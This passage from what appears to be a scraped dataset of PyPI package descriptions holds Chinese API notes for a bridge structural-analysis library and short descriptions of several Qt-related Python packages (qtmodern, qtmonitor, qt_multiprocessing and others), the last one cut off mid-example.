\u65e0add_elastic_link\u6dfb\u52a0\u5f39\u6027\u8fde\u63a5Args:index:\u8282\u70b9\u7f16\u53f7link_type:\u8282\u70b9\u7c7b\u578bstart_id:\u8d77\u59cb\u8282\u70b9\u53f7end_id:\u7ec8\u8282\u70b9\u53f7beta_angle:\u8d1d\u5854\u89d2boundary_info:\u8fb9\u754c\u4fe1\u606fgroup_name:\u8fb9\u754c\u7ec4\u540ddis_ratio:\u8ddd\u79bb\u6bd4kx:\u521a\u5ea6Returns: \u65e0add_beam_constraint\u6dfb\u52a0\u6881\u7aef\u7ea6\u675fArgs:index:\u7ea6\u675f\u7f16\u53f7,\u9ed8\u8ba4\u81ea\u52a8\u8bc6\u522bbeam_id:\u6881\u53f7info_i:i\u7aef\u7ea6\u675f\u4fe1\u606f [IsFreedX,IsFreedY,IsFreedZ,IsFreedRX,IsFreedRY,IsFreedRZ]info_j:j\u7aef\u7ea6\u675f\u4fe1\u606f [IsFreedX,IsFreedY,IsFreedZ,IsFreedRX,IsFreedRY,IsFreedRZ]group_name:\u8fb9\u754c\u7ec4\u540dReturns: \u65e0add_node_axis\u6dfb\u52a0\u8282\u70b9\u5750\u6807Args:index:\u9ed8\u8ba4\u81ea\u52a8\u8bc6\u522binput_type:\u8f93\u5165\u65b9\u5f0fnode_id:\u8282\u70b9\u53f7coord_info:\u5c40\u90e8\u5750\u6807\u4fe1\u606f -List(\u89d2) -List(\u4e09\u70b9/\u5411\u91cf)Returns: \u65e0\u79fb\u52a8\u8377\u8f7dadd_standard_vehicle\u6dfb\u52a0\u6807\u51c6\u8f66\u8f86Args:name:\u8f66\u8f86\u8377\u8f7d\u540d\u79f0standard_code:\u8377\u8f7d\u89c4\u8303load_type:\u8377\u8f7d\u7c7b\u578bload_length:\u8377\u8f7d\u957f\u5ea6n:\u8f66\u53a2\u6570Returns: \u65e0add_node_tandem\u6dfb\u52a0\u8282\u70b9\u7eb5\u5217Args:name:\u8282\u70b9\u7eb5\u5217\u540dstart_id:\u8d77\u59cb\u8282\u70b9\u53f7node_ids:\u8282\u70b9\u5217\u8868Returns: \u65e0add_influence_plane\u6dfb\u52a0\u5f71\u54cd\u9762Args:name:\u5f71\u54cd\u9762\u540d\u79f0tandem_names:\u8282\u70b9\u7eb5\u5217\u540d\u79f0\u7ec4Returns: \u65e0add_lane_line\u6dfb\u52a0\u8f66\u9053\u7ebfArgs:name:\u8f66\u9053\u7ebf\u540d\u79f0influence_name:\u5f71\u54cd\u9762\u540d\u79f0tandem_name:\u8282\u70b9\u7eb5\u5217\u540doffset:\u504f\u79fbdirection:\u65b9\u5411Returns: \u65e0add_live_load_case\u6dfb\u52a0\u79fb\u52a8\u8377\u8f7d\u5de5\u51b5Args:name:\u8377\u8f7d\u5de5\u51b5\u540dinfluence_plane:\u5f71\u54cd\u7ebf\u540dspan:\u8de8\u5ea6sub_case:\u5b50\u5de5\u51b5\u4fe1\u606f ListReturns: \u65e0remove_vehicle\u5220\u9664\u8f66\u8f86\u4fe1\u606fArgs:index:\u8f66\u8f86\u8377\u8f7d\u7f16\u53f7Returns: \u65e0remove_node_tandem\u6309\u7167 \u8282\u70b9\u7eb5\u5217\u7f16\u53f7/\u8282\u70b9\u7eb5\u5217\u540d \u5220\u9664\u8282\u70b9\u7eb5\u5217Args:index:\u8282\u70b9\u7eb5\u5217\u7f16\u53f7name:\u8282\u70b9\u7eb5\u5217\u540dReturns: \u65e0remove_influence_plane\u6309\u7167 \u5f71\u54cd\u9762\u7f16\u53f7/\u5f71\u54cd\u9762\u540d\u79f0 \u5220\u9664\u5f71\u54cd\u9762Args:index:\u5f71\u54cd\u9762\u7f16\u53f7name:\u5f71\u54cd\u9762\u540d\u79f0Returns: \u65e0remove_lane_line\u6309\u7167 \u8f66\u9053\u7ebf\u7f16\u53f7/\u8f66\u9053\u7ebf\u540d\u79f0 \u5220\u9664\u8f66\u9053\u7ebfArgs:name:\u8f66\u9053\u7ebf\u540d\u79f0index:\u8f66\u9053\u7ebf\u7f16\u53f7Returns: \u65e0remove_live_load_case\u5220\u9664\u79fb\u52a8\u8377\u8f7d\u5de5\u51b5Args:name:\u79fb\u52a8\u8377\u8f7d\u5de5\u51b5\u540dReturns: \u65e0\u94a2\u675f\u64cd\u4f5cadd_tendon_group\u6309\u7167\u540d\u79f0\u6dfb\u52a0\u94a2\u675f\u7ec4\uff0c\u6dfb\u52a0\u65f6\u53ef\u6307\u5b9a\u94a2\u675f\u7ec4idArgs:name: \u94a2\u675f\u7ec4\u540d\u79f0index: \u94a2\u675f\u7ec4\u7f16\u53f7(\u975e\u5fc5\u987b\u53c2\u6570)\uff0c\u9ed8\u8ba4\u81ea\u52a8\u8bc6\u522bReturns: \u65e0remove_tendon_group\u6309\u7167\u94a2\u675f\u7ec4\u540d\u79f0\u6216\u94a2\u675f\u7ec4\u7f16\u53f7\u5220\u9664\u94a2\u675f\u7ec4\uff0c\u4e24\u53c2\u6570\u5747\u4e3a\u9ed8\u8ba4\u65f6\u5220\u9664\u6240\u6709\u94a2\u675f\u7ec4Args:name:\u94a2\u675f\u7ec4\u540d\u79f0,\u9ed8\u8ba4\u81ea\u52a8\u8bc6\u522b (\u53ef\u9009\u53c2\u6570)index:\u94a2\u675f\u7ec4\u7f16\u53f7,\u9ed8\u8ba4\u81ea\u52a8\u8bc6\u522b (\u53ef\u9009\u53c2\u6570)Returns: \u65e0add_tendon_property\u6dfb\u52a0\u94a2\u675f\u7279\u6027Args:name:\u94a2\u675f\u7279\u6027\u540dindex:\u94a2\u675f\u7f16\u53f7,\u9ed8\u8ba4\u81ea\u52a8\u8bc6\u522b (\u53ef\u9009\u53c2\u6570)tendon_type: 0-PRE 1-POSTmaterial_id: \u94a2\u6750\u6750\u6599\u7f16\u53f7duct_type: 1-\u91d1\u5c5e\u6ce2\u7eb9\u7ba1 2-\u5851\u6599\u6ce2\u7eb9\u7ba1 3-\u94c1\u76ae\u7ba1 4-\u94a2\u7ba1 5-\u62bd\u82af\u6210\u578bsteel_type: 1-\u94a2\u7ede\u7ebf 2-\u87ba\u7eb9\u94a2\u7b4bsteel_detail: \u94a2\u7ede\u7ebf[\u94a2\u675f\u9762\u79ef,\u5b54\u9053\u76f4\u5f84,\u6469\u963b\u7cfb\u6570,\u504f\u5dee\u7cfb\u6570] \u87ba\u7eb9\u94a2\u7b4b[\u94a2\u7b4b\u76f4\u5f84,\u94a2\u675f\u9762\u79ef,\u5b54\u9053\u76f4\u5f84,\u6469\u963b\u7cfb\u6570,\u504f\u5dee\u7cfb\u6570,\u5f20\u62c9\u65b9\u5f0f(1-\u4e00\u6b21\u5f20\u62c9\\2-\u8d85\u5f20\u62c9)]loos_detail: \u677e\u5f1b\u4fe1\u606f[\u89c4\u8303(1-\u516c\u89c4 2-\u94c1\u89c4),\u5f20\u62c9(1-\u4e00\u6b21\u5f20\u62c9 2-\u8d85\u5f20\u62c9),\u677e\u5f1b(1-\u4e00\u822c\u677e\u5f1b 2-\u4f4e\u677e\u5f1b)] (\u4ec5\u94a2\u7ede\u7ebf\u9700\u8981)slip_info: \u6ed1\u79fb\u4fe1\u606f[\u59cb\u7aef\u8ddd\u79bb,\u672b\u7aef\u8ddd\u79bb]Returns: \u65e0add_tendon_3d\u6dfb\u52a0\u4e09\u7ef4\u94a2\u675fArgs:name:\u94a2\u675f\u540d\u79f0property_name:\u94a2\u675f\u7279\u6027\u540d\u79f0group_name:\u9ed8\u8ba4\u94a2\u675f\u7ec4num:\u6839\u6570line_type:1-\u5bfc\u7ebf\u70b9 2-\u6298\u7ebf\u70b9position_type: \u5b9a\u4f4d\u65b9\u5f0f 1-\u76f4\u7ebf 2-\u8f68\u8ff9\u7ebfcontrol_info: \u63a7\u5236\u70b9\u4fe1\u606f[[x1,y1,z1,r1],[x2,y2,z2,r2]....]point_insert: \u5b9a\u4f4d\u65b9\u5f0f\u4e3a\u76f4\u7ebf\u65f6\u4e3a\u63d2\u5165\u70b9\u5750\u6807[x,y,z], \u8f68\u8ff9\u7ebf\u65f6\u4e3a [\u63d2\u5165\u7aef(1-I 2-J),\u63d2\u5165\u65b9\u5411(1-ij 2-ji),\u63d2\u5165\u5355\u5143id]tendon_direction:\u76f4\u7ebf\u94a2\u675f\u65b9\u5411\u5411\u91cf x\u8f74-[1,0,0] y\u8f74-[0,1,0] (\u8f68\u8ff9\u7ebf\u65f6\u4e0d\u7528\u8d4b\u503c)rotation_angle:\u7ed5\u94a2\u675f\u65cb\u8f6c\u89d2\u5ea6track_group:\u8f68\u8ff9\u7ebf\u7ed3\u6784\u7ec4\u540d (\u76f4\u7ebf\u65f6\u4e0d\u7528\u8d4b\u503c)Returns: \u65e0remove_tendon\u6309\u7167\u540d\u79f0\u6216\u7f16\u53f7\u5220\u9664\u94a2\u675f,\u9ed8\u8ba4\u65f6\u5220\u9664\u6240\u6709\u94a2\u675fArgs:name:\u94a2\u675f\u540d\u79f0index:\u94a2\u675f\u7f16\u53f7Returns: \u65e0remove_tendon_property\u6309\u7167\u540d\u79f0\u6216\u7f16\u53f7\u5220\u9664\u94a2\u675f\u7ec4,\u9ed8\u8ba4\u65f6\u5220\u9664\u6240\u6709\u94a2\u675f\u7ec4Args:name:\u94a2\u675f\u7ec4\u540d\u79f0index:\u94a2\u675f\u7ec4\u7f16\u53f7Returns: \u65e0add_nodal_mass\u6dfb\u52a0\u8282\u70b9\u8d28\u91cfArgs:node_id:\u8282\u70b9\u7f16\u53f7mass_info:[m,rmX,rmY,rmZ]Returns: \u65e0remove_nodal_mass\u5220\u9664\u8282\u70b9\u8d28\u91cfArgs:node_id:\u8282\u70b9\u53f7Returns: \u65e0add_pre_stress\u6dfb\u52a0\u9884\u5e94\u529bArgs:index:\u7f16\u53f7case_name:\u8377\u8f7d\u5de5\u51b5\u540dtendon_name:\u94a2\u675f\u540dpre_type:\u9884\u5e94\u529b\u7c7b\u578bforce:\u9884\u5e94\u529bgroup_name:\u8fb9\u754c\u7ec4Returns: \u65e0remove_pre_stress\u5220\u9664\u9884\u5e94\u529bArgs:case_name:\u8377\u8f7d\u5de5\u51b5tendon_name:\u94a2\u675f\u7ec4group_name:\u8fb9\u754c\u7ec4\u540dReturns: \u65e0\u8377\u8f7d\u64cd\u4f5cadd_load_group\u6839\u636e\u8377\u8f7d\u7ec4\u540d\u79f0\u6dfb\u52a0\u8377\u8f7d\u7ec4Args:name: \u8377\u8f7d\u7ec4\u540d\u79f0index: \u8377\u8f7d\u7ec4\u7f16\u53f7\uff0c\u9ed8\u8ba4\u81ea\u52a8\u8bc6\u522b (\u53ef\u9009\u53c2\u6570)Returns: \u65e0remove_load_group\u6839\u636e\u8377\u8f7d\u7ec4\u540d\u79f0\u6216\u8377\u8f7d\u7ec4id\u5220\u9664\u8377\u8f7d\u7ec4,\u53c2\u6570\u4e3a\u9ed8\u8ba4\u65f6\u5220\u9664\u6240\u6709\u8377\u8f7d\u7ec4Args:name: \u8377\u8f7d\u7ec4\u540d\u79f0index: \u8377\u8f7d\u7ec4\u7f16\u53f7Returns: \u65e0add_nodal_force\u6dfb\u52a0\u8282\u70b9\u8377\u8f7dcase_name:\u8377\u8f7d\u5de5\u51b5\u540dnode_id:\u8282\u70b9\u7f16\u53f7load_info:[Fx,Fy,Fz,Mx,My,Mz]group_name:\u8377\u8f7d\u7ec4\u540dReturns: \u65e0remove_nodal_force\u5220\u9664\u8282\u70b9\u8377\u8f7dArgs:case_name:\u8377\u8f7d\u5de5\u51b5\u540dnode_id:\u8282\u70b9\u7f16\u53f7Returns: \u65e0add_node_displacement\u6dfb\u52a0\u8282\u70b9\u4f4d\u79fbArgs:case_name:\u8377\u8f7d\u5de5\u51b5\u540dnode_id:\u8282\u70b9\u7f16\u53f7load_info:[Dx,Dy,Dz,Rx,Ry,Rz]group_name:\u8377\u8f7d\u7ec4\u540dReturns: \u65e0remove_nodal_displacement\u5220\u9664\u8282\u70b9\u4f4d\u79fbArgs:case_name:\u8377\u8f7d\u5de5\u51b5\u540dnode_id:\u8282\u70b9\u7f16\u53f7Returns: \u65e0add_beam_load\u6dfb\u52a0\u6881\u5355\u5143\u8377\u8f7dArgs:case_name:\u8377\u8f7d\u5de5\u51b5\u540dbeam_id:\u5355\u5143\u7f16\u53f7load_type:\u8377\u8f7d\u7c7b\u578bcoord_system:\u5750\u6807\u7cfbload_info:\u8377\u8f7d\u4fe1\u606fgroup_name:\u8377\u8f7d\u7ec4\u540dReturns: \u65e0remove_beam_load\u5220\u9664\u6881\u5355\u5143\u8377\u8f7dArgs:case_name:\u8377\u8f7d\u5de5\u51b5\u540delement_id:\u5355\u5143\u53f7load_type:\u8377\u8f7d\u7c7b\u578bgroup_name:\u8fb9\u754c\u7ec4\u540dReturns: \u65e0add_initial_tension\u6dfb\u52a0\u521d\u59cb\u62c9\u529bArgs:element_id:\u5355\u5143\u7f16\u53f7case_name:\u8377\u8f7d\u5de5\u51b5\u540dgroup_name:\u8377\u8f7d\u7ec4\u540dtension:\u521d\u59cb\u62c9\u529btension_type:\u5f20\u62c9\u7c7b\u578bReturns: \u65e0add_cable_length_load\u6dfb\u52a0\u7d22\u957f\u5f20\u62c9Args:element_id:\u5355\u5143\u7c7b\u578bcase_name:\u8377\u8f7d\u5de5\u51b5\u540dgroup_name:\u8377\u8f7d\u7ec4\u540dlength:\u957f\u5ea6tension_type:\u5f20\u62c9\u7c7b\u578bReturns: \u65e0add_plate_element_load\u6dfb\u52a0\u7248\u5355\u5143\u8377\u8f7dArgs:element_id:\u5355\u5143idcase_name:\u8377\u8f7d\u5de5\u51b5\u540dload_type:\u8377\u8f7d\u7c7b\u578bload_place:\u8377\u8f7d\u4f4d\u7f6ecoord_system:\u5750\u6807\u7cfbgroup_name:\u8377\u8f7d\u7ec4\u540dload_info:\u8377\u8f7d\u4fe1\u606fReturns: \u65e0add_deviation_parameter\u6dfb\u52a0\u5236\u9020\u8bef\u5deeArgs:name:\u540d\u79f0element_type:\u5355\u5143\u7c7b\u578bparameter_info:\u53c2\u6570\u5217\u8868Returns: \u65e0add_deviation_load\u6dfb\u52a0\u5236\u9020\u8bef\u5dee\u8377\u8f7dArgs:element_id:\u5355\u5143\u7f16\u53f7case_name:\u8377\u8f7d\u5de5\u51b5\u540dparameter_name:\u53c2\u6570\u540dgroup_name:\u8377\u8f7d\u7ec4\u540dReturns: \u65e0add_element_temperature\u6dfb\u52a0\u5355\u5143\u6e29\u5ea6Args:element_id:\u5355\u5143\u7f16\u53f7case_name:\u8377\u8f7d\u5de5\u51b5\u540dtemperature:\u6e29\u5ea6group_name:\u8377\u8f7d\u7ec4\u540dReturns: \u65e0add_gradient_temperature\u6dfb\u52a0\u68af\u5ea6\u6e29\u5ea6element_id:\u5355\u5143\u7f16\u53f7case_name:\u8377\u8f7d\u5de5\u51b5\u540dtemperature:\u6e29\u5ea6section_oriental:\u622a\u9762\u65b9\u5411element_type:\u5355\u5143\u7c7b\u578bgroup_name:\u8377\u8f7d\u7ec4\u540dReturns: \u65e0add_beam_section_temperature\u6dfb\u52a0\u6881\u622a\u9762\u6e29\u5ea6Args:element_id:\u5355\u5143\u7f16\u53f7case_name:\u8377\u8f7d\u5de5\u51b5\u540dpaving_thick:\u94fa\u8bbe\u539a\u5ea6temperature_type:\u6e29\u5ea6\u7c7b\u578bpaving_type:\u94fa\u8bbe\u7c7b\u578bgroup_name:\u8377\u8f7d\u7ec4\u540dReturns: \u65e0add_index_temperature\u6dfb\u52a0\u6307\u6570\u6e29\u5ea6Args:element_id:\u5355\u5143\u7f16\u53f7case_name:\u8377\u8f7d\u5de5\u51b5\u540dtemperature:\u5355\u5143\u7c7b\u578bindex:\u6307\u6570group_name:\u8377\u8f7d\u7ec4\u540dReturns: \u65e0add_plate_temperature\u6dfb\u52a0\u9876\u677f\u6e29\u5ea6Args:element_id:\u5355\u5143\u7f16\u53f7case_name:\u8377\u8f7dtemperature:\u6e29\u5ea6group_name:\u8377\u8f7d\u7ec4\u540dReturns: \u65e0\u6c89\u964d\u64cd\u4f5cadd_sink_group\u6dfb\u52a0\u6c89\u964d\u7ec4Args:name: \u6c89\u964d\u7ec4\u540dsink: \u6c89\u964d\u503cnode_ids: \u8282\u70b9\u7f16\u53f7Returns: \u65e0remove_sink_group\u6309\u7167\u540d\u79f0\u5220\u9664\u6c89\u964d\u7ec4Args:name:\u6c89\u964d\u7ec4\u540d,\u9ed8\u8ba4\u5220\u9664\u6240\u6709\u6c89\u964d\u7ec4Returns: \u65e0add_sink_case\u6dfb\u52a0\u6c89\u964d\u5de5\u51b5Args:name:\u8377\u8f7d\u5de5\u51b5\u540dsink_groups:\u6c89\u964d\u7ec4\u540dReturns: \u65e0remove_sink_case\u6309\u7167\u540d\u79f0\u5220\u9664\u6c89\u964d\u5de5\u51b5,\u4e0d\u8f93\u5165\u540d\u79f0\u65f6\u9ed8\u8ba4\u5220\u9664\u6240\u6709\u6c89\u964d\u5de5\u51b5Args:name:\u6c89\u964d\u5de5\u51b5\u540dReturns: \u65e0add_concurrent_reaction\u6dfb\u52a0\u5e76\u53d1\u53cd\u529b\u7ec4Args:names: \u7ed3\u6784\u7ec4\u540d\u79f0\u96c6\u5408Returns: \u65e0remove_concurrent_reaction\u5220\u9664\u5e76\u53d1\u53cd\u529b\u7ec4Returns: \u65e0add_concurrent_force\u6dfb\u52a0\u5e76\u53d1\u5185\u529bReturns: \u65e0remove_concurrent_force\u5220\u9664\u5e76\u53d1\u5185\u529bReturns: \u65e0add_load_case\u6dfb\u52a0\u8377\u8f7d\u5de5\u51b5Args:index:\u6c89\u964d\u5de5\u51b5\u7f16\u53f7name:\u6c89\u964d\u540dload_case_type:\u8377\u8f7d\u5de5\u51b5\u7c7b\u578bReturns: \u65e0remove_load_case\u5220\u9664\u8377\u8f7d\u5de5\u51b5,\u53c2\u6570\u5747\u4e3a\u9ed8\u8ba4\u65f6\u5220\u9664\u5168\u90e8\u8377\u8f7d\u5de5\u51b5Args:index:\u8377\u8f7d\u7f16\u53f7name:\u8377\u8f7d\u540dReturns: \u65e0test_print\u6d4b\u8bd5\u8fd0\u884cReturns: \u65e0\u65bd\u5de5\u9636\u6bb5\u548c\u8377\u8f7d\u7ec4\u5408add_construction_stage\u6dfb\u52a0\u65bd\u5de5\u9636\u6bb5\u4fe1\u606fArgs:name:\u65bd\u5de5\u9636\u6bb5\u4fe1\u606fduration:\u65f6\u957factive_structures:\u6fc0\u6d3b\u7ed3\u6784\u7ec4\u4fe1\u606f [[\u7ed3\u6784\u7ec4\u540d\uff0c(int)\u9f84\u671f\uff0c\u65bd\u5de5\u9636\u6bb5\u540d\uff0c(int)1-\u53d8\u5f62\u6cd5 2-\u63a5\u7ebf\u6cd5 3-\u65e0\u5e94\u529b\u6cd5],...]delete_structures:\u949d\u5316\u7ed3\u6784\u7ec4\u4fe1\u606f [\u7ed3\u6784\u7ec41\uff0c\u7ed3\u6784\u7ec42,...]active_boundaries:\u6fc0\u6d3b\u8fb9\u754c\u7ec4\u4fe1\u606f [[\u8fb9\u754c\u7ec41\uff0c(int)1-\u53d8\u5f62\u524d 2-\u53d8\u5f62\u540e],...]delete_boundaries:\u949d\u5316\u8fb9\u754c\u7ec4\u4fe1\u606f [\u8fb9\u754c\u7ec41\uff0c\u7ed3\u6784\u7ec42,...]active_loads:\u6fc0\u6d3b\u8377\u8f7d\u7ec4\u4fe1\u606f [[\u8377\u8f7d\u7ec41,(int)0-\u5f00\u59cb 1-\u7ed3\u675f],...]delete_loads:\u949d\u5316\u8377\u8f7d\u7ec4\u4fe1\u606f [[\u8377\u8f7d\u7ec41,(int)0-\u5f00\u59cb 1-\u7ed3\u675f],...]temp_loads:\u4e34\u65f6\u8377\u8f7d\u4fe1\u606f [\u8377\u8f7d\u7ec41\uff0c\u8377\u8f7d\u7ec42,..]index:\u65bd\u5de5\u9636\u6bb5\u7f16\u53f7\uff0c\u9ed8\u8ba4\u81ea\u52a8\u6dfb\u52a0Returns: \u65e0remove_construction_stage\u6309\u7167\u65bd\u5de5\u9636\u6bb5\u540d\u5220\u9664\u65bd\u5de5\u9636\u6bb5Args:name:\u6240\u5220\u9664\u65bd\u5de5\u9636\u6bb5\u540d\u79f0Returns: \u65e0remove_all_construction_stage\u5220\u9664\u6240\u6709\u65bd\u5de5\u9636\u6bb5Returns: \u65e0add_load_combine\u6dfb\u52a0\u8377\u8f7d\u7ec4\u5408Args:name:\u8377\u8f7d\u7ec4\u5408\u540dcombine_type:\u8377\u8f7d\u7ec4\u5408\u7c7b\u578bdescribe:\u63cf\u8ff0combine_info:\u8377\u8f7d\u7ec4\u5408\u4fe1\u606fReturns: \u65e0remove_load_combine\u5220\u9664\u8377\u8f7d\u7ec4\u5408,\u53c2\u6570\u9ed8\u8ba4\u65f6\u5220\u9664\u6240\u6709\u8377\u8f7d\u7ec4\u5408Args:name:\u6240\u5220\u9664\u8377\u8f7d\u7ec4\u5408\u540dReturns: \u65e0\u53c2\u6570\u8bf4\u660echarm_info\u5012\u89d2\u5217\u8868\u4e2d\u4fe1\u606f\u542b\u4e49\u8be6\u89c1\u6865\u901a\u754c\u9762\u5b9a\u4e49\u754c\u9762\uff0c\u6240\u9700\u53c2\u6570\u7c7b\u578b\u5747\u4e3astr\u7c7b\u578b\u5012\u89d2\u5217\u8868\uff1a[C1,C2,C3,C4]section_info\u622a\u9762\u4fe1\u606f\u5404\u53d8\u91cf\u542b\u4e49\u8be6\u89c1\u6865\u901a\u622a\u9762\u5b9a\u4e49\u754c\u9762\uff0c\u4ee5\u4e0b\u6240\u9700\u53c2\u6570\u7c7b\u578b\u5747\u4e3afloat\u5355\u7bb1\u591a\u5ba4\u6df7\u51dd\u571f\u622a\u9762\uff1a[i1,i2,B0,B1,B1a,B1b,B2,B3,B4,H1,H2,H2a,H2b,T1,T2,T3,T4,R1,R2]\u77e9\u5f62\u622a\u9762\uff1a[W,H]\u5706\u5f62\u622a\u9762\uff1a [D]\u5706\u7ba1\u622a\u9762\uff1a [D,t]\u7bb1\u578b\u622a\u9762\uff1a [W,H,dw,tw,tt,tb]\u5b9e\u8179\u516b\u8fb9\u5f62\u622a\u9762\uff1a [a,b,W,H]\u7a7a\u8179\u516b\u8fb9\u5f62\uff1a [W,H,tw,tt,tb,a,b]\u5185\u516b\u89d2\u5f62\u622a\u9762\uff1a [W,H,tw,tt,tb,a,b]\u5b9e\u8179\u5706\u7aef\u5f62\u622a\u9762\uff1a [W,H]\u7a7a\u8179\u5706\u7aef\u5f62\u622a\u9762\uff1a [H,W,tw,tt]T\u5f62\u622a\u9762\uff1a [H,W,tw,tt]\u5012T\u5f62\u622a\u9762\uff1a [H,W,tw,tb]I\u5b57\u5f62\u622a\u9762\uff1a [Wt,Wb,H,tw,tt,tb]\u9a6c\u8e44T\u5f62\u622a\u9762\uff1a [H,tb,b2,b1,tt,tw,W,a2,a1]I\u5b57\u578b\u6df7\u51dd\u571f\u622a\u9762\uff1a [tb,Wb,H,b2,b1,tt,Wt,tw,a2,a1]\u94a2\u7ba1\u783c\uff1a [D,t,Es/Ec,Ds/Dc,Ts/Tc,vC,\u03bdS]\u94a2\u7bb1\u783c\uff1a [W,H,dw,tw,tt,tb,Es/Ec,Ds/Dc,Ts/Tc,vC,\u03bdS]steel_detail\u94a2\u7ede\u7ebf\uff1a[\u94a2\u675f\u9762\u79ef,\u5b54\u9053\u76f4\u5f84,\u6469\u963b\u7cfb\u6570,\u504f\u5dee\u7cfb\u6570]\u87ba\u7eb9\u94a2\u7b4b\uff1a[\u94a2\u7b4b\u76f4\u5f84,\u94a2\u675f\u9762\u79ef,\u5b54\u9053\u76f4\u5f84,\u6469\u963b\u7cfb\u6570,\u504f\u5dee\u7cfb\u6570,\u5f20\u62c9\u65b9\u5f0f]\u5173\u952e\u5b57\u5b9a\u4e49\u5750\u6807\u7cfb\u5173\u8054\u53c2\u6570\uff1a coord_systemGLB_X = 1 # \u6574\u4f53\u5750\u6807XGLB_Y = 2 # \u6574\u4f53\u5750\u6807YGLB_Z = 3 # \u6574\u4f53\u5750\u6807ZLOC_X = 4 # \u5c40\u90e8\u5750\u6807XLOC_Y = 5 # \u5c40\u90e8\u5750\u6807YLOC_Z = 6 # \u5c40\u90e8\u5750\u6807Z\u94a2\u675f\u5b9a\u4f4d\u65b9\u5f0f\u5173\u8054\u53c2\u6570\uff1aposition_typeTYP_STRAIGHT = 1 # \u76f4\u7ebfTYP_TRACK = 2 # \u8f68\u8ff9\u7ebf\u8377\u8f7d\u5de5\u51b5\u7c7b\u578b\u5173\u8054\u53c2\u6570\uff1aload_case_typeLD_CS = \"\u65bd\u5de5\u9636\u6bb5\u8377\u8f7d\" # ConstructionStageLD_DL = \"\u6052\u8f7d\" # DeadLoadLD_LL = \"\u6d3b\u8f7d\" # LiveLoadLD_BF = \"\u5236\u52a8\u529b\" # BrakingForceLD_WL = \"\u98ce\u8377\u8f7d\" # WindLoadLD_ST = \"\u4f53\u7cfb\u6e29\u5ea6\u8377\u8f7d\" # SystemTemperatureLD_GT = \"\u68af\u5ea6\u6e29\u5ea6\u8377\u8f7d\" # GradientTemperatureLD_RD = \"\u957f\u8f68\u4f38\u7f29\u6320\u66f2\u529b\u8377\u8f7d\" # RailDeformationLD_DE = \"\u8131\u8f68\u8377\u8f7d\" # DerailmentLD_SC = \"\u8239\u8236\u649e\u51fb\u8377\u8f7d\" # ShipCollisionLD_VC = \"\u6c7d\u8f66\u649e\u51fb\u8377\u8f7d\" # VehicleCollisionLD_RB = \"\u957f\u8f68\u65ad\u8f68\u529b\u8377\u8f7d\" # RailBreakingForceLD_UD = \"\u7528\u6237\u5b9a\u4e49\u8377\u8f7d\" # UserDefine"} +{"package": "qtmodern", "pacakge-description": "qtmodernis a Python package aimed to make PyQt/PySide applications look\nbetter and consistent on multiple platforms. It provides a custom frameless\nwindow and a dark theme. In order to be compatible with multiple Python Qt\nwrappersQtPyis used. The initial idea\ncomes fromthis project.InstallationThe recommended way to install is by usingpip, i.e:pip install qtmodernUsageIn order to useqtmodern, simply apply the style you want to your\napplication and then, create aModernWindowenclosing the window you want tomodernize:import qtmodern.styles\nimport qtmodern.windows\n\n...\n\napp = QApplication()\nwin = YourWindow()\n\nqtmodern.styles.dark(app)\nmw = qtmodern.windows.ModernWindow(win)\nmw.show()\n\n..."} +{"package": "qtmodernb", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qt-module-manager", "pacakge-description": "qt-module-managerA Qt widget to inspect all imported modules, and reload them. \u26a1Speed up your development \ud83d\ude80Featuresfilter submodules to only display base modules, e.g. showPySide2, but hidePySide2.QtWidgetsfilter by name to search for a module, e.g.numpyreload the selected module for faster developmentsearch modulessearch modules & submodules"} +{"package": "qtmonitor", "pacakge-description": "qtmonitorSimple tool for creating a Qt-Dialog with updating values.The idea behind the project was the necessity to monitor some real-time values\non a robotic-prototype. The package allows you to create a simple UI with\na lot of values, that are updating constantly at specified intervals,\nwithout any knowledge of QT / PySide packagesRepositoryPyPIPyPI TestSetupTo installqtmonitoruse pip or download it fromPyPI.pipinstallqtmonitorExampleThere is an example module, which demonstrates how to write your own monitor.\nFeel free to dig down and explore the code. The file is located underyou-python-packages-folder/qtmonitor/example.pyTo run and see it in action feel free to use following command:python-mqtmonitor.exampleUsageFirst of all, you need to create some python methods, which would return\nthe value, you want to track. Here is a simple random int generator method.\nIt will be used to demonstrate the module, there is no practical use for it.importrandomdefrandom_int_value():returnrandom.randrange(0,1000)The easiest way to create you own monitor is to subclass theqtmonitor.MonitorclassfromqtmonitorimportMonitorclassMyMonitor(Monitor):def__init__(self,parent=None):super(MyMonitor,self).__init__(parent)Now add at least one group to put your values in:fromqtmonitorimportMonitorclassMyMonitor(Monitor):def__init__(self,parent=None):super(MyMonitor,self).__init__(parent)grp=self.add_group('My group')Add the values to the group and run the tool.\nFeel free to use providedrunmethod:importrandomfromqtmonitorimportMonitordefrandom_int_value():returnrandom.randrange(0,1000)classMyMonitor(Monitor):def__init__(self,parent=None):super(MyMonitor,self).__init__(parent)grp=self.add_group('My group')grp.add_value('Value',random_int_value)grp.add_value('Value 10ms',random_int_value,interval=10)if__name__=='__main__':fromqtmonitorimportrunrun('My monitor',MyMonitor)"} +{"package": "qtm-rt", "pacakge-description": "For older versions, see \u201cqtm\u201d package."} +{"package": "qtMUD", "pacakge-description": "qtMUD is a framework for developing and hosting MUDs, or Multi-User Dungeons; text-based MMORPGs."} +{"package": "qt-multiprocessing", "pacakge-description": "# qt_multiprocessingLong running process that runs along side of the Qt event loop and allows other widgets to live in the other process.## Quick Start```pythonimport osimport qt_multiprocessingfrom qtpy import QtWidgetsclass MyPIDLabel(QtWidgets.QLabel):def print_pid(self):text = self.text()print(text, 'PID:', os.getpid())return textclass MyPIDLabelProxy(qt_multiprocessing.WidgetProxy):PROXY_CLASS = MyPIDLabelGETTERS = ['text']if __name__ == '__main__':with qt_multiprocessing.MpApplication() as app:print(\"Main PID:\", os.getpid())# Proxylbl = MyPIDLabelProxy(\"Hello\")widg = QtWidgets.QDialog()lay = QtWidgets.QFormLayout()widg.setLayout(lay)# Forminp = QtWidgets.QLineEdit()btn = QtWidgets.QPushButton('Set Text')lay.addRow(inp, btn)def set_text():text = inp.text()lbl.setText(inp.text())# Try to somewhat prove that the label is in a different process.# `print_pid` Not exposed (will call in other process. Result will be None)print('Set Label text', text + '. Label text in this process', lbl.print_pid())# `print_pid` will run in a separate process and print the pid.btn.clicked.connect(set_text)widg.show()```Below is an example for if you want to manually create widgets in a different process without the proxy.```pythonimport osimport qt_multiprocessingfrom qtpy import QtWidgetsclass MyPIDLabel(QtWidgets.QLabel):def print_pid(self):text = self.text()print(text, 'PID:', os.getpid())return textdef create_process_widgets():lbl = 